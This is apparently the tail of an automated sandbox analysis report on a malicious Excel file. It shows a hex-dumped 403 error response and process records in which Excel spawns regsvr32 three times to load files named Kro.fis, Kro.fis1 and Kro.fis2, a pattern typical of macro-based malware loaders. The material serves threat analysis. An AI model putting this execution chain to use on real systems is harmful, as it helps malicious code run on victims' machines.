6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                Code Manipulations

                Statistics

                Behavior

                Click to jump to process

                System Behavior

                General

                Start time:14:06:35
                Start date:25/06/2021
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Imagebase:0x13fc50000
                File size:27641504 bytes
                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:14:06:40
                Start date:25/06/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 ..\Kro.fis
                Imagebase:0xffa70000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:14:06:40
                Start date:25/06/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 ..\Kro.fis1
                Imagebase:0xffa70000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:14:06:41
                Start date:25/06/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 ..\Kro.fis2
                Imagebase:0xffa70000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Disassembly

                Code Analysis

                Reset < >